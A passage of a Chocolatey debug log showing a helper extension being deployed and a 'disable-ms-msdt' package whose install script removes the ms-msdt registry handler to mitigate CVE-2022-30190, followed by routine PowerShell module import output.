[DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEnt.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinEnt.ps1\".\n2026-06-09 18:36:04,353 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinHome.ps1\"\n to 
\"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinHome.ps1\".\n2026-06-09 18:36:04,353 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinPro.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinPro.ps1\".\n2026-06-09 18:36:04,391 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer.ps1\".\n2026-06-09 18:36:04,422 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2008.ps1\".\n2026-06-09 18:36:04,433 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008R2.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2008R2.ps1\".\n2026-06-09 18:36:04,446 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2012.ps1\".\n2026-06-09 18:36:04,446 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012R2.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2012R2.ps1\".\n2026-06-09 18:36:04,462 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2016.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2016.ps1\".\n2026-06-09 18:36:04,462 4968 [DEBUG] - Attempting to copy 
\"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2019.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2019.ps1\".\n2026-06-09 18:36:04,479 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2022.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2022.ps1\".\n2026-06-09 18:36:04,479 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerDatacenter.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerDatacenter.ps1\".\n2026-06-09 18:36:04,511 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerEssentials.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerEssentials.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerFoundation.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerFoundation.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerSBS.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerSBS.ps1\".\n2026-06-09 18:36:04,526 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStandard.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerStandard.ps1\".\n2026-06-09 18:36:04,541 4968 [DEBUG] - Attempting to copy 
\"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStorage.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerStorage.ps1\".\n2026-06-09 18:36:04,541 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerWeb.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServerWeb.ps1\".\n2026-06-09 18:36:04,634 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinWorkstation.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinWorkstation.ps1\".\n2026-06-09 18:36:04,634 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsXen.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsXen.ps1\".\n2026-06-09 18:36:04,650 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-NuspecInfo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-NuspecInfo.ps1\".\n2026-06-09 18:36:04,650 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-PendingReboot.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-PendingReboot.ps1\".\n2026-06-09 18:36:04,666 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinName.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinName.ps1\".\n2026-06-09 18:36:04,666 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerBuild.ps1\"\n to 
\"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerBuild.ps1\".\n2026-06-09 18:36:04,681 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMajor.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerMajor.ps1\".\n2026-06-09 18:36:04,696 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMinor.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-WinVerMinor.ps1\".\n2026-06-09 18:36:06,228 4968 [WARN ] -  Installed/updated chocolatey-fastanswers extensions.\n2026-06-09 18:36:06,337 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\".\n2026-06-09 18:36:06,399 4968 [DEBUG] - There was no original file at 'C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.files'\n2026-06-09 18:36:06,399 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.extra\".\n2026-06-09 18:36:06,415 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.version\".\n2026-06-09 18:36:06,415 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.sxs\".\n2026-06-09 18:36:06,432 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\.chocolatey\\chocolatey-fastanswers.extension.0.0.2.2\\.pin\".\n2026-06-09 18:36:06,463 4968 [DEBUG] - Sending message 'HandlePackageResultCompletedMessage' out if there are subscribers...\n2026-06-09 18:36:06,463 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\.chocolateyPending\".\n2026-06-09 18:36:06,478 4968 [INFO ] -  The 
install of chocolatey-fastanswers.extension was successful.\n2026-06-09 18:36:06,478 4968 [INFO ] -   Deployed to 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers'\n2026-06-09 18:36:06,493 4968 [DEBUG] - Attempting to delete file \"\".\n2026-06-09 18:36:06,511 4968 [INFO ] - Downloading package from source 'https://community.chocolatey.org/api/v2/'\n2026-06-09 18:36:06,511 4968 [DEBUG] - Package download location 'https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0'\n2026-06-09 18:36:06,524 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0\n2026-06-09 18:36:06,775 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/package/disable-ms-msdt/1.0.0 249ms\n2026-06-09 18:36:06,775 4968 [INFO ] - [NuGet] Acquiring lock for the installation of disable-ms-msdt 1.0.0\n2026-06-09 18:36:06,791 4968 [INFO ] - [NuGet] Acquired lock for the installation of disable-ms-msdt 1.0.0\n2026-06-09 18:36:06,853 4968 [INFO ] - [NuGet] Installed disable-ms-msdt 1.0.0 from https://community.chocolatey.org/api/v2/ with content hash mLUKSJ1YoCnHmDrpUCp3KduSLRFG+au1K58/rjyiK/7SinA0ys+s/5dy2iivwm1oYVvrMwGKbW81NZypQV6hhQ==.\n2026-06-09 18:36:06,868 4968 [DEBUG] - Skipping package hash validation as feature 'usePackageHashValidation' is not enabled.\n2026-06-09 18:36:06,915 4968 [INFO ] - [NuGet] Adding package 'disable-ms-msdt.1.0.0 : chocolatey-fastanswers.extension (, )' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:06,947 4968 [INFO ] - [NuGet] Added package 'disable-ms-msdt.1.0.0 : chocolatey-fastanswers.extension (, )' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:06,961 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\disable-ms-msdt.1.0.0.nupkg\".\n2026-06-09 18:36:06,961 4968 [DEBUG] - Attempting to delete file 
\"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\.nupkg.metadata\".\n2026-06-09 18:36:06,979 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\disable-ms-msdt/1.0.0\\disable-ms-msdt.1.0.0.nupkg.sha512\".\n2026-06-09 18:36:06,979 4968 [INFO ] - \ndisable-ms-msdt v1.0.0 (forced) [Approved]\n2026-06-09 18:36:06,994 4968 [INFO ] - disable-ms-msdt package files install completed. Performing other installation steps.\n2026-06-09 18:36:07,055 4968 [DEBUG] - Setting installer args for disable-ms-msdt\n2026-06-09 18:36:07,055 4968 [DEBUG] - Setting package parameters for disable-ms-msdt\n2026-06-09 18:36:07,072 4968 [DEBUG] - Contents of 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1':\n2026-06-09 18:36:07,113 4968 [DEBUG] - if (Get-IsWinWorkstation) {\n\tif ((Test-Path REGISTRY::HKEY_CLASSES_ROOT\\ms-msdt) -eq $true){\n\t\tWrite-Host \"Non-compliant with (CVE-2022-30190) Remove-Item ms-msdt now...\" -ForegroundColor \"Magenta\"\n\t\tRemove-Item REGISTRY::HKEY_CLASSES_ROOT\\ms-msdt -Recurse -Force\n\t\tWrite-Host \"Compliant with (CVE-2022-30190)\" -ForegroundColor \"Green\"\n\t} else {\n\t\tWrite-Host \"Now Compliant with (CVE-2022-30190)\" -ForegroundColor \"Green\"\n\t}\n} else {\n\tWrite-Host \"Not required on Windows Server\" -ForegroundColor \"Magenta\"\n}\n\n2026-06-09 18:36:07,167 4968 [DEBUG] - Calling built-in PowerShell host with ['[System.Threading.Thread]::CurrentThread.CurrentCulture = '';[System.Threading.Thread]::CurrentThread.CurrentUICulture = '';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::SystemDefault; & import-module -name 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyInstaller.psm1'; & 'C:\\ProgramData\\chocolatey\\helpers\\chocolateyScriptRunner.ps1' -packageScript 'C:\\ProgramData\\chocolatey\\lib\\disable-ms-msdt\\tools\\ChocolateyInstall.ps1' 
-installArguments '' -packageParameters '' -preRunHookScripts $null -postRunHookScripts $null']\n2026-06-09 18:36:07,196 4968 [DEBUG] - Redirecting System.Management.Automation.resources, Version=3.0.0.0, Culture=en-US, PublicKeyToken=31bf3856ad364e35, requested by ''\n2026-06-09 18:36:08,477 4968 [DEBUG] - Host version is 5.1.17763.1, PowerShell Version is '5.1.17763.6893' and CLR Version is '4.0.30319.42000'.\n2026-06-09 18:36:10,291 4968 [INFO ] - VERBOSE: Loading module from path 'C:\\ProgramData\\chocolatey\\helpers\\Chocolatey.PowerShell.dll'.\n2026-06-09 18:36:10,337 4968 [DEBUG] - Returning loaded assembly type for 'Chocolatey.PowerShell'\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:10,352 4968 [INFO ] - VERBOSE: Importing cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:10,369 4968 [INFO ] - VERBOSE: Importing cmdlet 'Update-SessionEnvironment'.\n2026-06-09 18:36:10,477 4968 [DEBUG] - Cmdlets exported from Chocolatey.PowerShell.dll\n2026-06-09 18:36:10,524 4968 [DEBUG] - Get-EnvironmentVariable\n2026-06-09 18:36:10,524 4968 [DEBUG] - Get-EnvironmentVariableNames\n2026-06-09 18:36:10,540 4968 [DEBUG] - Install-ChocolateyPath\n2026-06-09 18:36:10,540 4968 [DEBUG] - Set-EnvironmentVariable\n2026-06-09 18:36:10,540 4968 [DEBUG] - Test-ProcessAdminRights\n2026-06-09 18:36:10,540 4968 [DEBUG] - Uninstall-ChocolateyPath\n2026-06-09 18:36:10,557 4968 [DEBUG] - Update-SessionEnvironment\n2026-06-09 18:36:10,588 4968 [INFO ] - VERBOSE: Exporting function 'Format-FileSize'.\n2026-06-09 18:36:10,604 4968 [INFO ] - VERBOSE: 
Exporting function 'Get-ChecksumValid'.\n2026-06-09 18:36:10,604 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyConfigValue'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyPath'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyUnzip'.\n2026-06-09 18:36:10,618 4968 [INFO ] - VERBOSE: Exporting function 'Get-ChocolateyWebFile'.\n2026-06-09 18:36:10,634 4968 [INFO ] - VERBOSE: Exporting function 'Get-FtpFile'.\n2026-06-09 18:36:10,634 4968 [INFO ] - VERBOSE: Exporting function 'Get-OSArchitectureWidth'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParameters'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-PackageParametersBuiltIn'.\n2026-06-09 18:36:10,649 4968 [INFO ] - VERBOSE: Exporting function 'Get-ToolsLocation'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-UACEnabled'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-UninstallRegistryKey'.\n2026-06-09 18:36:10,664 4968 [INFO ] - VERBOSE: Exporting function 'Get-VirusCheckValid'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFile'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebFileName'.\n2026-06-09 18:36:10,681 4968 [INFO ] - VERBOSE: Exporting function 'Get-WebHeaders'.\n2026-06-09 18:36:10,697 4968 [INFO ] - VERBOSE: Exporting function 'Install-BinFile'.\n2026-06-09 18:36:10,697 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:10,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyExplorerMenuItem'.\n2026-06-09 18:36:10,713 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyFileAssociation'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyInstallPackage'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 
'Install-ChocolateyPackage'.\n2026-06-09 18:36:10,727 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPinnedTaskBarItem'.\n2026-06-09 18:36:10,744 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyPowershellCommand'.\n2026-06-09 18:36:10,744 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyShortcut'.\n2026-06-09 18:36:10,758 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyVsixPackage'.\n2026-06-09 18:36:10,758 4968 [INFO ] - VERBOSE: Exporting function 'Install-ChocolateyZipPackage'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Install-Vsix'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Set-PowerShellExitCode'.\n2026-06-09 18:36:10,774 4968 [INFO ] - VERBOSE: Exporting function 'Start-ChocolateyProcessAsAdmin'.\n2026-06-09 18:36:10,790 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-BinFile'.\n2026-06-09 18:36:10,807 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyEnvironmentVariable'.\n2026-06-09 18:36:10,807 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyPackage'.\n2026-06-09 18:36:10,824 4968 [INFO ] - VERBOSE: Exporting function 'Uninstall-ChocolateyZipPackage'.\n2026-06-09 18:36:10,824 4968 [INFO ] - VERBOSE: Exporting function 'Write-FunctionCallLogMessage'.\n2026-06-09 18:36:10,836 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariable'.\n2026-06-09 18:36:10,836 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Get-EnvironmentVariableNames'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Install-ChocolateyPath'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Set-EnvironmentVariable'.\n2026-06-09 18:36:10,852 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Test-ProcessAdminRights'.\n2026-06-09 18:36:10,868 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Uninstall-ChocolateyPath'.\n2026-06-09 18:36:10,868 4968 [INFO ] - VERBOSE: Exporting cmdlet 'Update-SessionEnvironment'.\n2026-06-09 
18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-ProcessorBits'.\n2026-06-09 18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-OSBitness'.\n2026-06-09 18:36:10,884 4968 [INFO ] - VERBOSE: Exporting alias 'Get-InstallRegistryKey'.\n2026-06-09 18:36:10,899 4968 [INFO ] - VERBOSE: Exporting alias 'Generate-BinFile'.\n2026-06-09 18:36:10,899 4968 [INFO ] - VERBOSE: Exporting alias 'Add-BinFile'.\n2026-06-09 18:36:10,914 4968 [INFO ] - VERBOSE: Exporting alias 'Start-ChocolateyProcess'.\n2026-06-09 18:36:10,914 4968 [INFO ] - VERBOSE: Exporting alias 'Invoke-ChocolateyProcess'.\n2026-06-09 18:36:10,930 4968 [INFO ] - VERBOSE: Exporting alias 'Remove-BinFile'.\n2026-06-09 18:36:10,930 4968 [INFO ] - VERBOSE: Exporting alias 'refreshenv'.\n2026-06-09 18:36:10,947 4968 [DEBUG] - Loading community extensions\n2026-06-09 18:36:10,993 4968 [DEBUG] - Importing 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1'\n2026-06-09 18:36:11,008 4968 [INFO ] - VERBOSE: Loading module from path 'C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1'.\n2026-06-09 18:36:11,495 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is32'.\n2026-06-09 18:36:11,509 4968 [INFO ] - VERBOSE: Exporting function 'Get-Is64'.\n2026-06-09 18:36:11,509 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDCPU'.\n2026-06-09 18:36:11,526 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsAMDVideo'.\n2026-06-09 18:36:11,526 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsARMCPU'.\n2026-06-09 18:36:11,541 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsHyperV'.\n2026-06-09 18:36:11,556 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsInDomain'.\n2026-06-09 18:36:11,572 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelCPU'.\n2026-06-09 18:36:11,572 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsIntelVideo'.\n2026-06-09 18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsKVM'.\n2026-06-09 
18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsMobile'.\n2026-06-09 18:36:11,588 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:11,603 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsSSD'.\n2026-06-09 18:36:11,633 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVirtualBox'.\n2026-06-09 18:36:11,633 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVM'.\n2026-06-09 18:36:11,650 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsVMware'.\n2026-06-09 18:36:11,650 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin10'.\n2026-06-09 18:36:11,666 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin11'.\n2026-06-09 18:36:11,666 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin7'.\n2026-06-09 18:36:11,680 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin8'.\n2026-06-09 18:36:11,680 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin80'.\n2026-06-09 18:36:11,696 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWin81'.\n2026-06-09 18:36:11,696 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEdu'.\n2026-06-09 18:36:11,713 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinEnt'.\n2026-06-09 18:36:11,713 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinHome'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinPro'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer'.\n2026-06-09 18:36:11,729 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008'.\n2026-06-09 18:36:11,743 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2008R2'.\n2026-06-09 18:36:11,743 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012'.\n2026-06-09 18:36:11,759 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2012R2'.\n2026-06-09 18:36:11,759 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2016'.\n2026-06-09 18:36:11,774 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServer2019'.\n2026-06-09 18:36:11,774 4968 [INFO 
] - VERBOSE: Exporting function 'Get-IsWinServer2022'.\n2026-06-09 18:36:11,774 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerDatacenter'.\n2026-06-09 18:36:11,791 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerEssentials'.\n2026-06-09 18:36:11,791 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerFoundation'.\n2026-06-09 18:36:11,806 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerSBS'.\n2026-06-09 18:36:11,806 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStandard'.\n2026-06-09 18:36:11,823 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerStorage'.\n2026-06-09 18:36:11,823 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinServerWeb'.\n2026-06-09 18:36:11,837 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsWinWorkstation'.\n2026-06-09 18:36:11,837 4968 [INFO ] - VERBOSE: Exporting function 'Get-IsXen'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-NuspecInfo'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-PendingReboot'.\n2026-06-09 18:36:11,853 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinName'.\n2026-06-09 18:36:11,869 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerBuild'.\n2026-06-09 18:36:11,869 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMajor'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Exporting function 'Get-WinVerMinor'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Importing function 'Get-Is32'.\n2026-06-09 18:36:11,883 4968 [INFO ] - VERBOSE: Importing function 'Get-Is64'.\n2026-06-09 18:36:11,899 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDCPU'.\n2026-06-09 18:36:11,899 4968 [INFO ] - VERBOSE: Importing function 'Get-IsAMDVideo'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 'Get-IsARMCPU'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 'Get-IsHyperV'.\n2026-06-09 18:36:11,916 4968 [INFO ] - VERBOSE: Importing function 
'Get-IsInDomain'.\n2026-06-09 18:36:11,931 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelCPU'.\n2026-06-09 18:36:11,931 4968 [INFO ] - VERBOSE: Importing function 'Get-IsIntelVideo'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsKVM'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsMobile'.\n2026-06-09 18:36:11,947 4968 [INFO ] - VERBOSE: Importing function 'Get-IsNvidiaVideo'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsSSD'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVirtualBox'.\n2026-06-09 18:36:11,961 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVM'.\n2026-06-09 18:36:11,978 4968 [INFO ] - VERBOSE: Importing function 'Get-IsVMware'.\n2026-06-09 18:36:11,978 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin10'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin11'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin7'.\n2026-06-09 18:36:11,993 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin8'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin80'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWin81'.\n2026-06-09 18:36:12,008 4968 [INFO ] - VERBOSE: Importing function 'Get-IsWinEdu'.\n2026-06-09 